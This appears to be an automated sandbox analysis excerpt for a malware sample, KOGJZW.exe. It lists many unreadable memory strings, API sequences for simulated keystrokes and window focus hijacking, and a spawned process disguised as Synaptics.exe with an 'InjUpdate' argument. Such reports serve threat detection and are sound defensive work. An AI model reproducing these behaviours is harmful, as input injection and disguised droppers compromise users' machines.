Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c9ym8nx1pi6j	memstr_26846d77-d
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: o7qm6ar3wn8f	memstr_60cff9ea-3
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: k3mh0pi3cr6q	memstr_f3dcc34d-9
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: b5ra1zk1in5y	memstr_55d0d9be-7
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: e3jb8kx1j	memstr_a13e6453-4
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: l0dg3gj3k	memstr_62b05660-4
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: f5pt6yp1og9c1~d	memstr_04898363-2
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: t6pm6ok4c6~a	memstr_92bbbfe5-d
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: e3jb8kx1j6q;~n	memstr_d1a9fabd-7
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: t6pm6ok4c ~k	memstr_0e422a93-e
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: t6pm6ok4c6q%~p	memstr_2c213cff-a
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: b5ra1zk1in5y*~]	memstr_bbc5ab5d-3
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: b5ra1zk1in5y/~z	memstr_cd992e80-c
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: t6pm6ok4ct~'	memstr_eb5628fd-6
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: k3mh0pi3cr6qy~,	memstr_75e2f9d2-5
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: b5ra1zk1in5y^~)	memstr_bf662121-b
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: k3mh0pi3cr6qc~6	memstr_ce8ab88c-7
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: i8ql4sc1ih~3	memstr_255eaef7-b
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: i8ql4sc1im~8	memstr_69d3aa44-2
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: k3mh0pi3cr6qr~	memstr_37b3242f-0
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: i8ql4sc1i8fw~	memstr_254960a7-4
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: o7qm6ar3wn8f\|~	memstr_51016c7a-0
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: l0dg3gj3ka~	memstr_86d84b5b-d
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: t6pm6ok4c4hf~	memstr_713a12a4-7
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: l0dg3gj3kk~	memstr_ad7591d2-c
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: e3jb8kx1j9c	memstr_baf3f6d3-3
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: v2aj7bj2w	memstr_8c9a2c80-a
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: t6pm6ok4c	memstr_5726aac2-6
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: f3oa6oq1t	memstr_4d81adb8-f
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 6ar3wn8f	memstr_75ac533a-7
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: r1gb0ju7al6f	memstr_4f80108d-8
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: t6pm6ok4c4b	memstr_131b2f2a-5
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: i8ql4sc1i	memstr_9d0c0c4b-3
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: t6pm6ok4c9c	memstr_85d6c9db-f
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 6yp1og9c	memstr_ca1fd93a-b
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: t2us8mq4cd4b	memstr_9f0833ec-0
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: o7qm6ar3wn8f0}{	memstr_2940e038-2
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: b5ra1zk1in5y5}@	memstr_9d005a63-b
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: t2us8mq4cd4b:}m	memstr_96841cef-5
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: f5pt6yp1og9c?}j	memstr_8480c4c4-1
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: k3mh0pi3cr6q$}w	memstr_b3cf2b37-9
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 5bj6td4h)}\	memstr_c042f228-b
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: f5pt6yp1og9c.}y	memstr_531e777e-8
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: o7qm6ar3wn8fs}&	memstr_290b480a-3
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: f5pt6yp1og9cx}#	memstr_1609d056-d
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: b5ra1zk1in5y]}(	memstr_65069c93-4
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: t6pm6ok4c8fb}5	memstr_f3cb61aa-8
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: f5pt6yp1og9cg}2	memstr_ae31f3fe-a
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: f5pt6yp1og9cq}	memstr_26f9246f-c
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: f3oa6oq1tev}	memstr_24282cf6-3
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: i8ql4sc1i`}	memstr_3d764317-8
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: i8ql4sc1ie}	memstr_a93764d8-6
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: r1gb0ju7al6fj}	memstr_263e33d4-c
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: k3mh0pi3cr6qo}	memstr_0326b4b9-0
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: r3wn8f	memstr_6fc42331-4
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: h4av3dk2l	memstr_30a6e7ea-6
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: i8ql4sc1i9cd	memstr_966953f1-e
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: t6pm6ok4cmand	memstr_0297c4cb-3
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: j3yg0ox5h	memstr_6833a381-8
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: s3jr3od4t0a	memstr_402be578-6
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: e2fa0fc0na0a	memstr_b772ddd8-2
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: z8wv6ej7j	memstr_100866a0-d
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: k3mh0pi3cr6q\|k	memstr_9a2a3ff4-4
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 211730765	memstr_2f59621a-1
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: i8ql4sc1i4\|g	memstr_b469acde-2
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: k3mh0pi3cr6q9\|l	memstr_393d2af1-3
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: t6pm6ok4c>\|i	memstr_15414e4e-4
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: o7qm6ar3wn8f#\|v	memstr_3010ef3b-9
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: t6pm6ok4c5y(\|s	memstr_fa6eb78f-a
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: b5ra1zk1in5y-\|x	memstr_8c512fec-b
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 211730776r\|%	memstr_e10513ae-2
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: i8ql4sc1iw\|"	memstr_46086ce0-c
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: t6pm6ok4c\\|/	memstr_dc98169f-8
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: i8ql4sc1ia\|4	memstr_83291e4d-0
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 211730776f\|1	memstr_d033dd31-4
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: t6pm6ok4c6qk\|>	memstr_26c8fa17-c
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: q4ii5bj6td4hp\|;	memstr_bf53ff71-c
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: k3mh0pi3cr6qu\|	memstr_9c8fc556-e
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: b5ra1zk1in5yz\|	memstr_55b47b12-b
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: q4ii5bj6td4hd\|	memstr_3e7c2d9c-f
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: o7qm6ar3wn8fi\|	memstr_9539a36f-2
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: z8wv6ej7jn\|	memstr_2d8f986f-2
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 2117307574h	memstr_4343037b-8
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: s3jr3od4t	memstr_5e44f223-c
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: n2yh9gy5d	memstr_2591f93c-1
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 211730763	memstr_99fae4a0-8
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: t6pm6ok4cace	memstr_5195a180-2
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: z4tm0pu3ug2o	memstr_f84d32d8-e
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: k3mh0pi3cr6q{\|	memstr_3fc16c7c-8
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: k3mh0pi3cr6q3{f	memstr_0d12350e-e
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: o7qm6ar3wn8f8{c	memstr_e5900fb9-d
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: i8ql4sc1i={h	memstr_dcf4e62f-d
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: o7qm6ar3wn8f"{u	memstr_3d72ddb0-e
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: q4ii5bj6td4h'{r	memstr_8e89aa02-5
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: b5ra1zk1in5y,{_	memstr_21efc905-7
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: b5ra1zk1in5yq{$	memstr_53fbb481-5
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: q4ii5bj6td4hv{!	memstr_a5998ecf-5
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: k3mh0pi3cr6q[{.	memstr_c53c6264-4
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: q4ii5bj6td4h@{+	memstr_8b675ff9-f
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: z4tm0pu3ug2oe{0	memstr_880a2c42-9
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 0pu3ug2oj{=	memstr_8037d35a-f
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: q4ii5bj6td4ho{:	memstr_2c531171-9
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: z4tm0pu3ug2ot{	memstr_2f1af229-a
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: t6pm6ok4cy{	memstr_e710fba9-2
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: q4ii5bj6td4h~{	memstr_b5c9a020-2
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: i8ql4sc1ic{	memstr_6a992ec7-1
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: b5ra1zk1in5yh{	memstr_125c6bbb-0
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: q4ii5bj6td4hm{	memstr_559cd549-1
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: i8ql4sc1i6q	memstr_1ca26e84-f
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: u7cj7zw0pr9p	memstr_9558fc92-7
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: z4ei8ys5wo5n	memstr_4a44bb26-7
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: n8bj2dx9rh6g	memstr_64defdc1-7
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: k7ey6gf0k	memstr_6e5c1e7d-8
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: z2rq5vh9r8f	memstr_a55b52f8-3
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: f1kd6rz2t	memstr_ef27023d-d
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: t6pm6ok4c8f	memstr_803798a1-b
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 211730757	memstr_484efded-2
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: t8nu2rw8h5n	memstr_7d92ea09-d
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: z2rq5vh9r2ze	memstr_d84f6c12-3
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: k3mh0pi3cr6q7zb	memstr_a2c5c9e2-d
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: t6pm6ok4c<zo	memstr_fb70be00-4
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: t6pm6ok4c&zq	memstr_3d112aa7-3
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: k3mh0pi3cr6qpz[	memstr_6c423224-4
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: t6pm6ok4c5nuz	memstr_59c02207-5
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: o0bb9wx0ys4izz-	memstr_fc0db8f7-5
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1zk1in5y_z*	memstr_2985812e-3
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: rrore8udz7	memstr_287c1028-b
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: t8nu2rw8hiz<	memstr_6157faad-5
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: w5pe2ay1ye8unz9	memstr_559f4918-1
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: e4od9ba0hxz	memstr_62ffadfe-6
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: b1rq1ze1lf8e}z	memstr_da6bb9ad-7
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: o7qm6ar3wn8fbz	memstr_4ffc2c18-2
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: o0bb9wx0ys4igz	memstr_a00c67bf-7
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: rrorlz	memstr_7358e922-b
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 9wx0ys4i	memstr_ac732a57-f
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: i0fv8ic1h	memstr_c54605f5-5
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: o0bb9wx0ys4i	memstr_594f9a1a-c
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: z3pw6jo3mh6r	memstr_fd13816c-d
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: t8nu2rw8h	memstr_03f75d3a-6
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: p7jd1vp0yn4r	memstr_a56844ae-f
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: t8nu2rw8h0h	memstr_6c933813-7
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: t8nu2rw8h5y	memstr_c04aa132-4
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: f1kd6rz2t4i	memstr_35b7fa5d-d
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: z4ei8ys5wo5n1yd	memstr_72ae44be-3
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: b5ra1zk1in5y;yn	memstr_51ca8f92-8
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: n8bj2dx9rh6g yk	memstr_ebf92b4a-5
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: y6zw1wy7xa0h%yp	memstr_ef182e9c-5
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: y6zw1wy7xa0h*y]	memstr_c1892c85-d
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: o0bb9wx0ys4i/yz	memstr_76c0fb4a-d
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: rrorty'	memstr_919d2ae7-3
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: x9rh6gyy,	memstr_efc9e178-5
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: n8bj2dx9rh6g^y)	memstr_d1744c16-c
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: o0bb9wx0ys4icy6	memstr_30cf03a9-e
Source: ._cache_KOGJZW.exe, 00000002.00000002.2601484342.0000000004154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: z2rq5vh9rhy3	memstr_7fa7c11b-8

Source: C:\Users\user\Desktop\._cache_KOGJZW.exe

Code function: 2_2_0042F78E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

2_2_0042F78E

Source: C:\Users\user\Desktop\._cache_KOGJZW.exe

Code function: 2_2_00457DD5 mouse_event,

2_2_00457DD5

Source: C:\Users\user\Desktop\KOGJZW.exe	Process created: C:\Users\user\Desktop\._cache_KOGJZW.exe "C:\Users\user\Desktop\._cache_KOGJZW.exe"	Jump to behavior
Source: C:\Users\user\Desktop\KOGJZW.exe	Process created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate	Jump to behavior
